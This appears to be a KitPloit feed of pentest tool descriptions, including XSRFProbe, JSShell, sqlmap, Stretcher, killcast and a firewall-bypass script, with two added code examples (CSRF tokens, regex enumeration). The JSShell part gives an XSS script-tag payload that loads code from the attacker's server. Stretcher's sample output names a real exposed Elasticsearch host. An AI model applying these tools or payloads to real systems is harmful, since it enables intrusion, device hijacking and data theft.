Channel: KitPloit - PenTest Tools!

SiteBroker - A Cross-Platform Python Based Utility For Information Gathering And Penetration Testing Automation!


A cross-platform python based utility for information gathering and penetration automation!

Output
Sitebroker's Full Output

Requirements
  • Python (2.7.*)
  • Python pip
  • Python module requests
  • Python module colorama
  • Python module dnspython
  • Python module lxml
  • Python module bs4

Install modules
pip install -r requirements.txt

Tested on
  • Windows 7/8/8.1
  • Kali linux (2017.2)

Download SiteBroker
You can download the latest version of SiteBroker by cloning the GitHub repository.
git clone https://github.com/Anon-Exploiter/SiteBroker

Updates
  • Changed the whole script into Python (previously it was written in PHP)
  • Exceptions covered for both user interrupts && internal issues!
  • Removed the NetCraft module, as it needs Selenium and PhantomJS (ultimately making the script slow!)
  • Fixed the problem of a '200' response code for most sites in the Admin Panel Finder module && Shell Finder module

Change-log
  • Added New Features For Reverse IP (Via HackerTarget&& YouGetSignal)
  • Added New Features For Crawling (Via Google, Bing && Manually With My Hands ;)
  • Added New Method For Subdomains Scanning! (Takes Some Time Though :p)

Usage
Initializing Script
python SiteBroker.py

Advanced Usage

Author: Syed Umar Arfeen (An0n 3xPloiTeR)

Usage: python SiteBroker.py
A cross-platform python based utility for information gathering and penetration automation!

Options:

1). Cloudflare Bypass.
2). Website Crawler.
|____ Google Based Crawling
|____ Bing Based Crawling
|____ Manually Crawling
3). Reverse IP.
|____ YouGetSignal Based
|____ HackerTarget's API Based
4). Information Gathering.
|____ Whois Lookup
|____ BrowserSpy Report
5). Nameservers.
6). WebSite Speed.
7). Subdomains Scanner
8). Shell Finder.
9). Admin Panel Finder.
10). Grab Banner.
11). All Things.

Example:
python SiteBroker.py

Screenshots
XSRFProbe - The Prime Cross Site Request Forgery Audit And Exploitation Toolkit


XSRFProbe is an advanced Cross Site Request Forgery (CSRF/XSRF) Audit and Exploitation Toolkit. Equipped with a powerful crawling engine and numerous systematic checks, it is able to detect most cases of CSRF vulnerabilities and their related bypasses, and further generate (maliciously) exploitable proofs of concept for each vulnerability found. For more info on how XSRFProbe works, see XSRFProbe Internals on the wiki.

Some Features:
  • Performs several types of checks before declaring an endpoint as vulnerable.
  • Can detect several types of Anti-CSRF tokens in POST requests.
  • Includes a powerful crawler that supports continuous crawling and scanning.
  • Out-of-the-box support for custom cookie values and generic headers.
  • Accurate token-strength detection and analysis using various algorithms.
  • Can generate both normal as well as maliciously exploitable CSRF PoCs.
  • Follows a redirect when there is a 30x response.
  • Well documented code and a highly generalised automated workflow.
  • The user is in control of everything the scanner does.
  • Has a user-friendly interaction environment with full verbose support.
  • Detailed logging of errors, vulnerabilities, tokens and other data.
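The two properties behind "anti-CSRF token detection" and "token-strength detection" in that list are whether a token is actually bound to the session and how much guessing resistance it carries. The following is an added example written for this page, not XSRFProbe's code: a session-bound HMAC token as a server should issue and validate it, plus a token-strength estimate of the kind an audit tool derives from several observed token values (alphabet size times length, with a flag for tokens that never change between responses). All names and the SERVER_SECRET value are assumptions of this example.

```python
import hashlib
import hmac
import math
import secrets

# Constructed placeholder: a real deployment loads this from a secrets
# manager and never hard-codes it.
SERVER_SECRET = b"example-only-server-secret"


def generate_csrf_token(session_id, secret=SERVER_SECRET):
    """Issue a token bound to one session.

    token = nonce "." HMAC-SHA256(secret, session_id ":" nonce)
    The nonce carries 128 bits of randomness; the MAC ties the token to the
    session, so a token lifted from another session does not validate.
    """
    nonce = secrets.token_hex(16)
    mac = hmac.new(secret, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"


def validate_csrf_token(token, session_id, secret=SERVER_SECRET):
    """Recompute the MAC for this session and compare in constant time."""
    nonce, sep, mac = token.partition(".")
    if not sep or len(nonce) != 32:
        return False
    expected = hmac.new(secret, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(mac, expected)


def assess_token_strength(samples, min_bits=64):
    """Estimate the guessing resistance of tokens observed for one form.

    samples: token values seen across several responses. The estimate is
    length * log2(alphabet size), an upper bound on the entropy a token of
    that shape can carry. A token that never changes is flagged as static
    regardless of its length, since a fixed token can simply be replayed.
    """
    if not samples:
        raise ValueError("need at least one token sample")
    length = min(len(s) for s in samples)
    alphabet = set("".join(samples))
    bits_per_char = math.log2(len(alphabet)) if len(alphabet) > 1 else 0.0
    estimated_bits = length * bits_per_char
    static = len(set(samples)) == 1
    verdict = "weak" if static or estimated_bits < min_bits else "ok"
    return {
        "length": length,
        "alphabet_size": len(alphabet),
        "estimated_bits": round(estimated_bits, 1),
        "static": static,
        "verdict": verdict,
    }


if __name__ == "__main__":
    tok = generate_csrf_token("session-A")
    print("valid for owner:", validate_csrf_token(tok, "session-A"))
    print("valid for other session:", validate_csrf_token(tok, "session-B"))
    print(assess_token_strength([generate_csrf_token("session-A") for _ in range(3)]))
    print(assess_token_strength(["deadbeef", "deadbeef", "deadbeef"]))
```

The strength estimate is deliberately an upper bound: a token made of 32 hex characters can carry at most 128 bits, and a scanner that sees the same value in every response should report it as weak before looking at its length at all.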

Gallery:
Let's see some real-world scenarios of XSRFProbe in action:
Warnings:
Do not use this tool on a live site!
It is because this tool is designed to perform all kinds of form submissions automatically which can sabotage the site. Sometimes you may screw up the database and most probably perform a DoS on the site as well.
Test on a disposable/dummy setup/site!

Disclaimer:
Usage of XSRFProbe for testing websites without prior mutual consent can be considered an illegal activity. It is the final user's responsibility to obey all applicable local, state and federal laws. The author assumes no liability and is not exclusively responsible for any misuse or damage caused by this program.

Author's Words:
This project is based entirely upon my own research and my own experience with web applications and Cross-Site Request Forgery attacks. You can try going through the source code, which is highly documented, to help you understand how this toolkit was built. Useful pull requests, ideas and issues are highly welcome. If you wish to see how XSRFProbe is being developed, check out the Development Board.
That's it folks. Thank you...
Copyright © Infected Drake


Kalitorify - Transparent Proxy Through Tor For Kali Linux OS


kalitorify is a shell script for Kali Linux which uses iptables rules to set up a transparent proxy through Tor. The program also allows you to perform various checks, such as checking your external IP or whether Tor has been configured correctly.

What is Transparent Proxy?
Also known as an intercepting proxy, inline proxy, or forced proxy, a transparent proxy intercepts normal communication at the network layer without requiring any special client configuration. Clients need not be aware of the existence of the proxy. A transparent proxy is normally located between the client and the Internet, with the proxy performing some of the functions of a gateway or router.
Strictly speaking, with kalitorify you can redirect all traffic of your Kali Linux operating system through Tor.
The Tor Project wiki explains what a "transparent proxy through Tor" is and documents the related settings.

Recommendations
kalitorify is produced independently from the Tor anonymity software and carries no guarantee from the Tor Project about quality, suitability or anything else. Please read these documents to learn how to use the Tor network safely:
Tor General FAQ
Whonix Do Not recommendations

Install

Install dependencies:
sudo apt update && sudo apt full-upgrade -y

sudo apt install tor -y

Install kalitorify and reboot:
git clone https://github.com/brainfucksec/kalitorify

cd kalitorify/

sudo make install

sudo reboot

Usage
kalitorify [option]

Options
-t, --tor
start transparent proxy through tor
-c, --clearnet
reset iptables and return to clearnet navigation
-s, --status
check status of program and services
-i, --ipinfo
show public IP
-r, --restart
restart tor service and change IP


JSShell - An Interactive Multi-User Web JS Shell

An interactive multi-user web based JavaScript shell. It was initially created in order to debug remote esoteric browsers during experiments and research. This tool can easily be attached to an XSS (Cross Site Scripting) payload to achieve browser remote code execution (similar to the BeEF framework).
Version 2.0 was written entirely from scratch, introducing exciting new features, stability and maintainability.

Author
Daniel Abeles.

Shell Video
Features
  • Multi client support
  • Cyclic DOM objects support
  • Pre flight scripts
  • Command Queue & Context
  • Extensible with Plugins
  • Injectable via <script> tags
  • Dumping command output to file
  • Shell pagination

Installation & Setup

Config File
In the resources directory, update the config.json file with your desired configuration:
  • Database host - if running with the docker deployment method, choose the database host as db (which is the internal host name).
  • Return URL - the URL which the requests will follow. The shell.js file does some AJAX calls to register and poll for new commands. Usually it will be http://{YOUR_SERVER_IP}:{PORT}.
  • Startup script - a script that runs automatically when the JSShell CLI client is spawned.
  • It is also possible to point at a remote database if desired.

Docker
This new version is intended to be installed and run via docker and docker-compose. To install and run the entire JSShell framework, simply run:
$ ./start_docker_shell.sh
This will:
  • Start and create the database in the background
  • Start the web API server that handles incoming connections in the background
  • Spawn a new instance of the JSShell command line interface container

Regular
If you still want to use the old-fashioned method of installing, simply make sure you have a MongoDB database up and running, and update the config.json file residing in the resources directory.
I recommend using a virtual environment with pyenv:
$ pyenv virtualenv -p python3.6 venv
$ pyenv activate venv
Or using virtualenv:
$ virtualenv -p python3.6 venv
$ source venv/bin/activate
Then, install the requirements:
$ pip install -r requirements.txt

Running
If you used the docker method, there's no need to run the following procedure.

Web Server
Otherwise, once we have the database set up, we need to start the web API server. To do so, run:
$ python manage.py web
This will create and run a web server that listens to incoming connections and serves our JSShell code.

Shell
Now to start the JSShell CLI, run the same script but now with the shell flag:
$ python manage.py shell

Usage
After setup and running the required components, enter the help command to see the available commands:
╦╔═╗┌─┐┬ ┬┌─┐┬  ┬  
║╚═╗└─┐├─┤├┤ │ │
╚╝╚═╝└─┘┴ ┴└─┘┴─┘┴─┘ 2.0
by @Daniel_Abeles

>> help

Documented commands (type help <topic>):

General Commands
--------------------------------------------------------------------------------
edit Edit a file in a text editor
help List available commands or provide detailed help for a specific command
history View, run, edit, save, or clear previously entered commands
ipy Enter an interactive IPython shell
py Invoke Python command or shell
quit Exit this application

Shell Based Operations
--------------------------------------------------------------------------------
back Un-select the current selected client
clients List and control the clients that have registered to our system
commands Show the executed commands on the selected client
dump Dumps a command to the disk
execute Execute commands on the selected client
select Select a client as the current client

>>

Flow
JSShell supports 2 methods of operation:
  1. Injectable Shell (similar to BeeF framework)
  2. Hosted Shell (for debugging)

Injectable Shell
Similar to other XSS control frameworks (like BeEF), JSShell is capable of managing successful XSS exploitations. For example, if you can inject a script tag, add the following resource to your payload, and a new client will appear in your console:
<script src="http://{YOUR_SERVER_IP}:{PORT}/content/js"></script>

Hosted Shell
If you desire to debug exotic and esoteric browsers, you can simply navigate to http://{YOUR_SERVER_IP}:{PORT}/ and a new client will pop up into your JSShell CLI client. Now it is debuggable via our JSShell console.

Credits
Canop for JSON.prune

use it at your own responsibility and risk.


PRETty - "PRinter Exploitation Toolkit" LAN Automation Tool


PRETty is useful when a large number of printers are present on a network. Instead of scanning, logging, and manually running PRET against each individual printer, PRETty will automatically discover and run chosen PRET payloads against all printers on the target network. Additionally, PRETty can be used to automate command/payload delivery to any given list of printers (see the "Lists" section).

GUIDE:

Installation
  1. Install PRET and all required dependencies
  2. Install requirements: sudo pip install termcolor
  3. Navigate to where you installed PRET: cd $PRET
  4. Install PRETty into PRET: git clone https://github.com/BusesCanFly/PRETty
  5. Navigate to PRETty: cd PRETty
  6. Make PRETty executable: chmod +x PRETty.py
  • One line variant (from PRET folder): sudo pip install termcolor && git clone https://github.com/BusesCanFly/PRETty && cd PRETty && chmod +x PRETty.py

Lists
  • PRETty automatically scans the LAN for HP printers and creates an IP list for itself
    • However, you can place custom IP lists in PRETty/IP/
  • PRETty comes with pre-made command files for PRET located in PRETty/commands/
    • However, you can place additional command files in PRETty/commands/

Usage
  1. Run PRETty with ./PRETty.py and follow the prompts :D

Shodanploit - Shodan Command Line Interface Written In Python


Shodan is a search engine on the internet where you can find interesting things all over the world. For example, we can find cameras, bitcoin streams, zombie computers, ports with weakness in service, SCADA systems, and more. Moreover, more specific searches are possible. As a result of the search, Shodan shows us the number of vulnerable hosts on Earth.

So what does shodansploit do?
With Shodansploit, you can make all your Shodan API calls from your terminal. It also allows you to make detailed searches.
All you have to do before running Shodansploit is to add your Shodan API key.

Note :
The quality of the search will change according to the api privileges you have used.


Shodan API Documentation :

Shodan API Specification :
The banner is the main type of information that Shodan provides through the REST and Streaming API. This document outlines the various properties that are always present and which ones are optional.
The exploit type contains the normalized data from a variety of vulnerability data sources. The Exploits REST API returns this type for its search results. This document outlines the various properties that are always present and which ones are optional.

Programming Languages :
  • Python

System :
  • Linux
  • Windows

RUN
root@ismailtasdelen:~# git clone https://github.com/ismailtasdelen/shodansploit.git
root@ismailtasdelen:~# cd shodansploit
root@ismailtasdelen:~/shodansploit# python shodansploit.py

What's on the tool menu ?
[1] GET > /shodan/host/{ip} 
[2] GET > /shodan/host/count
[3] GET > /shodan/host/search
[4] GET > /shodan/host/search/tokens
[5] GET > /shodan/ports

[6] GET > /shodan/exploit/author
[7] GET > /shodan/exploit/cve
[8] GET > /shodan/exploit/msb
[9] GET > /shodan/exploit/bugtraq-id
[10] GET > /shodan/exploit/osvdb
[11] GET > /shodan/exploit/title
[12] GET > /shodan/exploit/description
[13] GET > /shodan/exploit/date
[14] GET > /shodan/exploit/code
[15] GET > /shodan/exploit/platform
[16] GET > /shodan/exploit/port

[17] GET > /dns/resolve
[18] GET > /dns/reverse
[19] GET > /labs/honeyscore/{ip}

[20] GET > /account/profile
[21] GET > /tools/myip
[22] GET > /tools/httpheaders
[23] GET > /api-info

[24] Exit

Cloning an Existing Repository ( Clone with HTTPS )
root@ismailtasdelen:~# git clone https://github.com/ismailtasdelen/shodansploit.git

Cloning an Existing Repository ( Clone with SSH )
root@ismailtasdelen:~# git clone https://github.com/ismailtasdelen/ismailtasdelen.git

Contact :
Mail : ismailtasdelen@protonmail.com
Linkedin : https://www.linkedin.com/in/ismailtasdelen/
GitHub : https://github.com/ismailtasdelen/
Telegram : https://t.me/ismailtasdelen/


Exrex - Irregular Methods On Regular Expressions


Exrex is a command line tool and python module that generates all - or random - matching strings for a given regular expression, and more. It's pure python, without external dependencies.
There are regular expressions with infinitely many matching strings (e.g. [a-z]+); in these cases exrex limits the maximum length of the infinite parts.
Exrex uses generators, so the memory usage does not depend on the number of matching strings.

Features
  • Generating all matching strings
  • Generating a random matching string
  • Counting the number of matching strings
  • Simplification of regular expressions

Installation
To install exrex, simply:
$ pip install exrex
or
$ easy_install exrex

Usage

as python module
>>> import exrex

>>> exrex.getone('(ex)r\\1')
'exrex'

>>> list(exrex.generate('((hai){2}|world!)'))
['haihai', 'world!']

>>> exrex.getone(r'\d{4}-\d{4}-\d{4}-[0-9]{4}')
'3096-7886-2834-5671'

>>> exrex.getone(r'(1[0-2]|0[1-9])(:[0-5]\d){2} (A|P)M')
'09:31:40 AM'

>>> exrex.count('[01]{0,9}')
1023

>>> print('\n'.join(exrex.generate(r'This is (a (code|cake|test)|an (apple|elf|output))\.')))
This is a code.
This is a cake.
This is a test.
This is an apple.
This is an elf.
This is an output.

>>> print(exrex.simplify('(ab|ac|ad)'))
(a[bcd])
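The generator-based design described above (memory use independent of the number of matches, a length cap on unbounded parts, counting without enumeration) is easy to see in a small self-contained enumerator. The block below is an added example written for this page, not exrex's own code. It supports a hypothetical subset of regex syntax (literals, \d, escaped literals, character classes with ranges, groups, alternation and the quantifiers * + ? {n} {n,m} {n,}; no backreferences, anchors or negated classes), caps unbounded repetition at limit the way exrex does, and computes count() arithmetically from the parse tree. The function names mirror exrex's generate() and count() for readability only.

```python
import math
import re


def _class(body):
    # "[a-cx]" has body "a-cx": expand ranges, then treat it as an alternation
    chars = re.sub(r"(.)-(.)", lambda m: "".join(map(chr, range(ord(m[1]), ord(m[2]) + 1))), body)
    return ("alt", [("lit", c) for c in chars])


def _rep(atom, lo, hi):
    # x{lo,hi} is an alternation over lo..hi copies of x, smallest first
    return ("alt", [("seq", [atom] * n) for n in range(lo, hi + 1)])


class _Parser:
    # Recursive descent over the subset grammar named in the lead-in.
    def __init__(self, pattern, limit):
        self.p, self.i, self.limit = pattern, 0, limit

    def peek(self):
        return self.p[self.i] if self.i < len(self.p) else None

    def take(self):
        self.i += 1
        return self.p[self.i - 1]

    def parse_alt(self):  # alt := seq ('|' seq)*
        branches = [self.parse_seq()]
        while self.peek() == "|":
            self.take()
            branches.append(self.parse_seq())
        return branches[0] if len(branches) == 1 else ("alt", branches)

    def parse_seq(self):  # seq := quant*
        items = []
        while self.peek() not in (None, "|", ")"):
            items.append(self.parse_quant())
        return ("seq", items)

    def parse_quant(self):  # quant := atom ('*' | '+' | '?' | '{n}' | '{n,m}' | '{n,}')?
        atom, ch = self.parse_atom(), self.peek()
        if ch in ("*", "+", "?"):
            self.take()
            return _rep(atom, *{"*": (0, self.limit), "+": (1, self.limit), "?": (0, 1)}[ch])
        if ch == "{":
            end = self.p.index("}", self.i)
            lo, comma, hi = self.p[self.i + 1 : end].partition(",")
            self.i = end + 1
            return _rep(atom, int(lo or 0), int(hi) if hi else (self.limit if comma else int(lo)))
        return atom

    def parse_atom(self):  # atom := '(' alt ')' | '[' class ']' | '\' c | c
        ch = self.take()
        if ch == "(":
            inner = self.parse_alt()
            if self.take() != ")":
                raise ValueError("unbalanced parentheses")
            return inner
        if ch == "[":
            end = self.p.index("]", self.i)
            body, self.i = self.p[self.i : end], end + 1
            return _class(body)
        if ch == "\\":
            esc = self.take()
            return _class("0-9") if esc == "d" else ("lit", esc)
        return ("lit", ch)


def _parse(pattern, limit):
    parser = _Parser(pattern, limit)
    tree = parser.parse_alt()
    if parser.peek() is not None:
        raise ValueError("unexpected %r" % parser.peek())
    return tree


def _gen(node):
    # Generator: memory use does not depend on the number of matching strings.
    kind, body = node
    if kind == "lit":
        yield body
    elif kind == "alt":
        for branch in body:
            yield from _gen(branch)
    elif not body:  # the empty sequence matches the empty string
        yield ""
    else:
        for head in _gen(body[0]):
            for tail in _gen(("seq", body[1:])):
                yield head + tail


def _count(node):
    # Arithmetic over the tree; the strings are never enumerated.
    kind, body = node
    if kind == "lit":
        return 1
    if kind == "alt":
        return sum(_count(b) for b in body)
    return math.prod(_count(it) for it in body)


def generate(pattern, limit=20):
    # Yield every string matching pattern; unbounded repeats are capped at limit.
    return _gen(_parse(pattern, limit))


def count(pattern, limit=20):
    # Number of strings generate() would yield, computed without enumerating.
    return _count(_parse(pattern, limit))
```

Rewriting x{lo,hi} as an alternation over lo..hi copies of x keeps both the generator and the counter down to three node kinds, and the count falls out as sums over alternations and products over sequences; for [01]{0,9} that is 2^0 + ... + 2^9 = 1023, matching the exrex session above.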

Command line usage
> exrex --help
usage: exrex.py [-h] [-o FILE] [-l] [-d DELIMITER] [-v] REGEX

exrex - regular expression string generator

positional arguments:
REGEX REGEX string

optional arguments:
-h, --help show this help message and exit
-o FILE, --output FILE
Output file - default is STDOUT
-l N, --limit N Max limit for range size - default is 20
-c, --count Count matching strings
-m N, --max-number N Max number of strings - default is -1
-r, --random Returns a random string that matches to the regex
-s, --simplify Simplifies a regular expression
-d DELIMITER, --delimiter DELIMITER
Delimiter - default is \n
-v, --verbose Verbose mode
Examples:
$ exrex '[asdfg]'
a
s
d
f
g

$ exrex -r '(0[1-9]|1[012])-\d{2}'
09-85

$ exrex '[01]{10}' -c
1024

Documentation
http://exrex.readthedocs.org/en/latest/

Fun/arts
  • Boat: exrex '( {20}(\| *\\|-{22}|\|)|\.={50}| ( ){0,5}\\\.| {12}~{39})'
  • Eyes: exrex '(o|O|0)(_)(o|O|0)'

Similar projects
Tools that generate a list of all possible strings that match a given pattern:
  • regldg (features a live demo on the website)
  • regex-genex (supports using multiple regex patterns simultaneously)
Tools that generate random strings, one by one, that match a given pattern:
  • randexp.js (features several live demos on the website)
  • rstr.xeger (a method of the rstr Python module)

Profiling
  • python -m cProfile exrex.py '[a-zA-Z][a-zA-Z][a-zA-Z][a-zA-Z]' -o /dev/null
  • python -m cProfile exrex.py '[0-9]{6}' -o /dev/null


Crashcast-Exploit - This Tool Allows You Mass Play Any YouTube Video With Chromecasts Obtained From Shodan.io


This tool allows you to mass play any YouTube video with Chromecasts obtained from Shodan.io

Prerequisites
You need Python 3.x installed:
sudo apt-get install python3
You also need cURL installed:
sudo apt-get install curl
You also need the Shodan Python module:
pip install shodan

Using Shodan API
This tool requires you to own an upgraded Shodan API
You may obtain one for free in Shodan if you sign up using a .edu email
Tool-X - A Kali Linux Hacking Tool Installer


What is Tool-X ?
Tool-X is a Kali Linux hacking tool installer, developed by Rajkumar Dusad. With the help of Tool-X you can install the best hacking tools on rooted or non-rooted Android devices. Tool-X offers almost 240 hacking tools for the Termux app and the GNURoot Debian terminal, and you can install any tool with a single click. Tool-X is specially made for Termux and the GNURoot Debian terminal, and is now also available for Ubuntu.

How to use ?
  • Type 0 : to install all tools.
  • Type 1 : to show all available tools, then type the number of the tool you want to install.
  • Type 2 : to show the tool categories.
  • Type 3 : to install an operating system in termux.
  • Type 4 : to update Tool-X.
  • Type 5 : to learn about us.
  • Type x : to exit.


Tool-X is available for
  • Android
  • Ubuntu

How to Install in termux ?
Open the termux app and type following commands.
  • apt update
  • pkg install git
  • git clone https://github.com/Rajkumrdusad/Tool-X.git
  • cd Tool-X
  • chmod +x install.aex
  • sh install.aex (if that does not work, type ./install.aex)

Tool-X is now installed. Type Tool-X from anywhere in your terminal to open it.


How to Install in GNURoot Debian Terminal ?
Open the GNURoot Debian app and type following commands.
  • apt update
  • apt install git
  • cd && git clone https://github.com/Rajkumrdusad/Tool-X.git
  • cd Tool-X
  • chmod +x install.aex
  • sh install.aex (if that does not work, type ./install.aex)

Tool-X is now installed. Type Tool-X from anywhere in your terminal to open it. But use this tool only for legal purposes.


How to install in Ubuntu ?
  • sudo apt-get update
  • sudo apt-get install git
  • sudo git clone https://github.com/Rajkumrdusad/Tool-X.git
  • cd Tool-X
  • chmod +x install.aex
  • sudo sh install.aex OR ./install.aex

Tool-X is now installed. Type Tool-X from anywhere in your terminal to open it. But use this tool only for legal purposes.


SQLMap v1.3 - Automatic SQL Injection And Database Takeover Tool


SQLMap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches ranging from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

Features
  • Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, HSQLDB and Informix database management systems.
  • Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band.
  • Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.
  • Support to enumerate users, password hashes, privileges, roles, databases, tables and columns.
  • Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.
  • Support to dump database tables entirely, a range of entries or specific columns as per user's choice. The user can also choose to dump only a range of characters from each column's entry.
  • Support to search for specific database names, specific tables across all databases or specific columns across all databases' tables. This is useful, for instance, to identify tables containing custom application credentials where relevant columns' names contain string like name and pass.
  • Support to download and upload any file from the database server underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
  • Support to execute arbitrary commands and retrieve their standard output on the database server underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
  • Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user's choice.
  • Support for database process' user privilege escalation via Metasploit's Meterpreter getsystem command.

Installation
You can download the latest tarball by clicking here or latest zipball by clicking here.
Preferably, you can download sqlmap by cloning the Git repository:
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
sqlmap works out of the box with Python version 2.6.x and 2.7.x on any platform.

Usage
To get a list of basic options and switches use:
python sqlmap.py -h
To get a list of all options and switches use:
python sqlmap.py -hh
You can find a sample run here. To get an overview of sqlmap capabilities, list of supported features and description of all options and switches, along with examples, you are advised to consult the user's manual.


Stretcher - Tool Designed To Help Identify Open Elasticsearch Servers That Are Exposing Sensitive Information


Stretcher is a tool to search for open elasticsearch servers.

Usage: python stretcher.py --shodan {key} --action analyze --threads {0..100} --dork
python stretcher.py --help
_____ __ __ __
/ ___// /_________ / /______/ /_ ___ _____
\__ \/ __/ ___/ _ \/ __/ ___/ __ \/ _ \/ ___/
___/ / /_/ / / __/ /_/ /__/ / / / __/ /
/____/\__/_/ \___/\__/\___/_/ /_/\___/_/



Tool designed to help identify incorrectly
Applications that are exposing sensitive


[+] Interesting indexes were found payment, address, email, user

Browser: http://34.224.104.129:80
Organization: Amazon.com
Hostnames: ec2-34-224-104-129.compute-1.amazonaws.com
Domains: amazonaws.com
City: Ashburn
Country: United States
Status: Without authentication (Open)

Installation
$ sudo pip3 install pyfiglet shodan elasticsearch 
$ cd $HOME/
$ git clone https://github.com/6IX7ine/stretcher/
$ sudo chmod -R 777 stretcher/

Disclaimer
Code samples are provided for educational purposes. Adequate defenses can only be built by researching attack techniques available to malicious actors. Using this code against target systems without prior permission is illegal in most jurisdictions. The authors are not liable for any damages from misuse of this information or code.


Aztarna - A Footprinting Tool For Robots


This repository contains Alias Robotics' aztarna, a footprinting tool for robots.
Alias Robotics supports original robot manufacturers in assessing their security and improving the quality of their software. By no means do we encourage or promote the unauthorized tampering with running robotic systems. This can cause serious human harm and material damages.

For ROS
  • A list of the ROS nodes present in the system (Publishers and Subscribers)
  • For each node, the published and subscribed topics, including the topic type
  • For each node, the ROS services each of the nodes offers
  • A list of all ROS parameters present in the Parameter Server
  • A list of the active communications running in the system. A single communication includes the involved publisher/subscriber nodes and the topics

For SROS
  • Determining if the system is a SROS master.
  • Detecting if demo configuration is in use.
  • A list of the nodes found in the system. (Extended mode)
  • A list of allow/deny policies for each node.
    • Publishable topics.
    • Subscribable topics.
    • Executable services.
    • Readable parameters.

For Industrial routers
  • Detecting eWON, Moxa, Sierra Wireless and Westermo industrial routers.
  • Default credential checking for found routers.

Installing

For production
Directly from PyPI
pip3 install aztarna
or from the repository:
pip3 install .

For development
pip3 install -e .
or
python3 setup.py develop
Python 3.7 and the setuptools package are required for installation.

Install with docker
docker build -t aztarna_docker .

Code usage:
usage: aztarna [-h] -t TYPE [-a ADDRESS] [-p PORTS] [-i INPUT_FILE]
               [-o OUT_FILE] [-e] [-r RATE] [--shodan] [--api-key API_KEY]

Aztarna

optional arguments:
  -h, --help            show this help message and exit
  -t TYPE, --type TYPE  <ROS/ros/SROS/sros/IROUTERS/irouters> Scan ROS, SROS
                        hosts or Industrial routers
  -a ADDRESS, --address ADDRESS
                        Single address or network range to scan.
  -p PORTS, --ports PORTS
                        Ports to scan (format: 13311 or 11111-11155 or
                        1,2,3,4)
  -i INPUT_FILE, --input_file INPUT_FILE
                        Input file of addresses to use for scanning
  -o OUT_FILE, --out_file OUT_FILE
                        Output file for the results
  -e, --extended        Extended scan of the hosts
  -r RATE, --rate RATE  Maximum simultaneous network connections
  --shodan              Use shodan for the scan types that support it.
  --api-key API_KEY     Shodan API Key

Run the code (example input file):
aztarna -t ROS -p 11311 -i ros_scan_s20.csv

Run the code with Docker (example input file):
docker run -v <host_path>:/root -it aztarna_docker -t ROS -p 11311 -i <input_file>

Run the code (example single ip address):
aztarna -t ROS -p 11311 -a 115.129.241.241

Run the code (example subnet):
aztarna -t ROS -p 11311 -a 115.129.241.0/24

Run the code (example single ip address, port range):
aztarna -t ROS -p 11311-11500 -a 115.129.241.241

Run the code (example single ip address, port list):
aztarna -t ROS -p 11311,11312,11313 -a 115.129.241.241

Run the code (example piping directly from zmap):
zmap -p 11311 0.0.0.0/0 -q | aztarna -t SROS -p 11311

Run the code (example search for industrial routers in shodan):
aztarna -t IROUTERS --shodan --api-key <yourshodanapikey>

Run the code (example search for industrial routers in shodan, piping to file):
aztarna -t IROUTERS --shodan --api-key <yourshodanapikey> -o routers.csv


Hediye - Hash Generator & Cracker Online Offline


Hash Generator & Cracker, online and offline. Supported hashes:
  • md5
  • sha1
  • sha224
  • sha256
  • sha384
  • sha512

Install Note
Clone the repository:
git clone https://github.com/0xR0/hediye.git
Then go inside:
cd hediye/
use examples:
python3 hediye.py -k Key / For --> Generate Hash (md5, sha1, sha224, sha256, sha384, sha512)
python3 hediye.py -v HASH -f Wordlist / For --> Brute Force Attack
python3 hediye.py -n HASH / For --> Online Search

Generate Hash
python3 hediye.py -k 4617165
Brute Force Attack
Online Search
Killcast - Manipulate Chromecast Devices In Your Network


Manipulate Chromecast Devices in your Network.

Inspiration - Thousands of Google Chromecast Devices Hijacked to Promote PewDiePie
This tool is a Proof of Concept and is for Research Purposes Only, killcast shows how Chromecast devices can be easily manipulated and hijacked by anyone.

Features
  • Extract Interesting Information such as Build Version, Country, Timezone etc
  • Rename
  • Reboot
  • Perform Factory Reset
  • Kill Active Applications such as YouTube, Netflix and Google Play Music

What is not working
  • Play any YouTube Video
  • Unable to kill Play Music
  • Other things that we are not aware of ;)

Tested On :
  • Kali Linux 2019.1
  • Ubuntu 18.04
  • Termux

Installation

Ubuntu / Kali Linux / Termux
git clone https://github.com/thewhiteh4t/killcast.git
cd killcast
apt-get install python3
pip install requests

Usage
python3 killcast.py -h

usage: killcast.py [-h] -t IP

Manipulate Chromecast Devices in your Network

optional arguments:
-h, --help show this help message and exit
-t IP, --ip IP IP Address of Chromecast
python3 killcast.py -t 192.168.0.100

Demo
bypass-firewalls-by-DNS-history - Firewall Bypass Script Based On DNS History Records


This script will try to find:
  • the direct IP address of a server behind a firewall like Cloudflare, Incapsula, SUCURI ...
  • an old server which is still running the same (inactive and unmaintained) website and not receiving active traffic because the DNS A record no longer points to it. Because it is an outdated and unmaintained version of the current active website, it is likely vulnerable to various exploits. It might be easier to find SQL injections in the old website, access its database and abuse that information against the current, active website.

This script (ab)uses DNS history records: it searches for old DNS A records and checks whether the server at each one still replies for that domain. It also outputs a confidence level, based on the similarity between the HTML responses of the possible origin server and of the firewall.

Usage
Use the script like this:
bash bypass-firewalls-by-DNS-history.sh -d example.com
  • -d --domain: domain to bypass
  • -o --outputfile: output file with IPs
  • -l --listsubdomains: list with subdomains for extra coverage

Requirements (optional)
jq is needed to parse output to gather automatically subdomains. Install with apt install jq.

For who is this script?
This script is handy for:
  • Security auditors
  • Web administrators
  • Bug bounty hunters
  • Blackhatters I guess ¯\_(ツ)_/¯

How to protect against this script?
